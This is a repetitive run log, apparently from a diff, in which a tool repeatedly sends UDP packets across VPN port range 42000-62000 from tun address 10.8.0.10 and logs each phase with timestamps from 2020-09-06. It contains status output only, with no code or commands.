w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:08:05 +Starting port fill at 2020-09-06 11:09:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:09:06 +Starting port fill at 2020-09-06 11:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:10:06 +Starting port fill at 2020-09-06 11:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:11:05 +Starting port fill at 2020-09-06 11:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:12:04 +Starting port fill at 2020-09-06 11:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:13:05 +Starting port fill at 2020-09-06 11:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:14:04 +Starting port fill at 2020-09-06 11:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:15:04 +Starting port fill at 2020-09-06 11:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:16:04 +Starting port fill at 2020-09-06 11:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:17:04 +Starting port fill at 2020-09-06 11:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:18:05 +Starting port fill at 2020-09-06 11:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:19:04 +Starting port fill at 2020-09-06 11:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:20:06 +Starting port fill at 2020-09-06 11:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:21:05 +Starting port fill at 2020-09-06 11:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:22:06 +Starting port fill at 2020-09-06 11:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:23:07 +Starting port fill at 2020-09-06 11:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:24:06 +Starting port fill at 2020-09-06 11:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:25:05 +Starting port fill at 2020-09-06 11:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:26:05 +Starting port fill at 2020-09-06 11:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:27:07 +Starting port fill at 2020-09-06 11:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 11:28:07 +Starting port fill at 2020-09-06 11:29:02 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:29:05 +Starting port fill at 2020-09-06 11:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:30:04 +Starting port fill at 2020-09-06 11:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 11:31:04 +Starting port fill at 2020-09-06 11:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 